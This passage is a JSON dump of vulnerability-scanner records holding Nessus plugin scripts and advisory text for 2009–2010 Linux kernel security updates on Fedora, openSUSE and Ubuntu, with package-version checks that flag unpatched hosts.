audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"kernel-2.6.30.10-105.2.13.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:01", "bulletinFamily": "scanner", "description": "The Linux kernel for openSUSE 11.2 was updated to 2.6.31.12 to fix the following bugs and security issues :\n\n - The permission of the devtmpfs root directory was incorrectly 1777 (instead of 755). If it was used, local attackers could escalate privileges. (openSUSE 11.2 does not use this filesystem by default). (CVE-2010-0299)\n\n - The poll_mode_io file for the megaraid_sas driver in the Linux kernel 2.6.31.6 and earlier has world-writable permissions, which allows local users to change the I/O mode of the driver by modifying this file.\n (CVE-2009-3939)\n\n - ebtables was lacking a CAP_NET_ADMIN check, making it possible for local unprivileged attackers to modify the network bridge management. (CVE-2010-0007)\n\n - An information leakage on fatal signals on x86_64 machines was fixed. (CVE-2010-0003)\n\n - A race condition in fasync handling could be used by local attackers to crash the machine or potentially execute code. (CVE-2009-4141)\n\n - The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram. (CVE-2010-0006)\n\n - drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that exceed the MTU by processing certain trailing payload data as if it were a complete frame, which allows remote attackers to bypass packet filters via a large packet with a crafted payload.\n (CVE-2009-4536)\n\n - drivers/net/e1000e/netdev.c in the e1000e driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to have an unspecified impact via crafted packets. (CVE-2009-4538)", "modified": "2018-07-31T00:00:00", "id": "SUSE_11_2_KERNEL-100128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44411", "published": "2010-02-09T00:00:00", "title": "SuSE 11.2 Security Update: kernel (2010-01-28)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Updates.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44411);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/31 17:27:54\");\n\n script_cve_id(\n \"CVE-2009-3939\",\n \"CVE-2009-4141\",\n \"CVE-2009-4536\",\n \"CVE-2009-4538\",\n \"CVE-2010-0003\",\n \"CVE-2010-0006\",\n \"CVE-2010-0007\",\n \"CVE-2010-0299\"\n );\n script_bugtraq_id(\n 37019,\n 37519,\n 37523,\n 37724,\n 37762,\n 37806,\n 37810,\n 38437\n );\n script_name(english:\"SuSE 11.2 Security Update: kernel (2010-01-28)\");\n script_summary(english:\"Check for the kernel package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Linux kernel for openSUSE 11.2 was updated to 2.6.31.12 to fix the\nfollowing bugs and security issues :\n\n - The permission of the devtmpfs root directory was\n incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges. (openSUSE 11.2 does\n not use this filesystem by default). (CVE-2010-0299)\n\n - The poll_mode_io file for the megaraid_sas driver in the\n Linux kernel 2.6.31.6 and earlier has world-writable\n permissions, which allows local users to change the I/O\n mode of the driver by modifying this file.\n (CVE-2009-3939)\n\n - ebtables was lacking a CAP_NET_ADMIN check, making it\n possible for local unprivileged attackers to modify the\n network bridge management. (CVE-2010-0007)\n\n - An information leakage on fatal signals on x86_64\n machines was fixed. (CVE-2010-0003)\n\n - A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially\n execute code. (CVE-2009-4141)\n\n - The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the\n Linux kernel before 2.6.32.4, when network namespaces\n are enabled, allows remote attackers to cause a denial\n of service (NULL pointer dereference) via an invalid\n IPv6 jumbogram. (CVE-2010-0006)\n\n - drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet\n frames that exceed the MTU by processing certain\n trailing payload data as if it were a complete frame,\n which allows remote attackers to bypass packet filters\n via a large packet with a crafted payload.\n (CVE-2009-4536)\n\n - drivers/net/e1000e/netdev.c in the e1000e driver in the\n Linux kernel 2.6.32.3 and earlier does not properly\n check the size of an Ethernet frame that exceeds the\n MTU, which allows remote attackers to have an\n unspecified impact via crafted packets. (CVE-2009-4538)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=565027\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=574664\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=573050\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=565904\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=492233\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=552353\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=557180\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=540589\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=565083\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=569902\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=570606\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568231\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=567340\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568120\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=537016\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568120\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=569902\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568305\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=551356\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=535939\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=564940\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-syms-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-default-1.1_2.6.31.12_0.1-6.9.12\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-desktop-1.1_2.6.31.12_0.1-6.9.12\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-debug / kernel-debug-base / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:01", "bulletinFamily": "scanner", "description": "Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. If a user were tricked into mounting a specially crafted filesystem, a remote attacker could crash the system or gain root privileges.\n(CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests.\nA local attacker with access to FUSE mounts could exploit this to crash the system or possibly gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly handle certain ioctls. A local attacker could exploit this to crash the system, or possibly gain root privileges. Ubuntu 6.06 was not affected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. A local attacker could exploit this to gain root privileges. Only Ubuntu 9.04 and 9.10 were affected.\n(CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames.\nAn attacker on the local network could send specially crafted traffic to bypass packet filters, crash the system, or possibly gain root privileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that 'print-fatal-signals' reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. By default this is disabled in Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. A remote attacker could exploit this to crash the system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be modified by unprivileged users. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel memory. A local attacker could exploit this to consume all available memory, leading to a denial of service. (CVE-2010-0291).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "UBUNTU_USN-894-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44399", "published": "2010-02-05T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : linux, linux-source-2.6.15 vulnerabilities (USN-894-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-894-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44399);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_bugtraq_id(37069, 37339, 37906);\n script_xref(name:\"USN\", value:\"894-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : linux, linux-source-2.6.15 vulnerabilities (USN-894-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures. If a user\nwere tricked into mounting a specially crafted filesystem, a remote\nattacker could crash the system or gain root privileges.\n(CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests.\nA local attacker with access to FUSE mounts could exploit this to\ncrash the system or possibly gain root privileges. Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions. A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly\nhandle certain ioctls. A local attacker could exploit this to crash\nthe system, or possibly gain root privileges. Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files. A local attacker could exploit this to gain\nroot privileges. Only Ubuntu 9.04 and 9.10 were affected.\n(CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames.\nAn attacker on the local network could send specially crafted traffic\nto bypass packet filters, crash the system, or possibly gain root\nprivileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that 'print-fatal-signals' reporting could show\narbitrary kernel memory contents. A local attacker could exploit this,\nleading to a loss of privacy. By default this is disabled in Ubuntu\nand did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames. A remote attacker could exploit this to crash the\nsystem, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\naffected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be\nmodified by unprivileged users. A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel\nmemory. A local attacker could exploit this to consume all available\nmemory, leading to a denial of service. (CVE-2010-0291).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/894-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.28\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove-z0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpiacompat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.28\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an 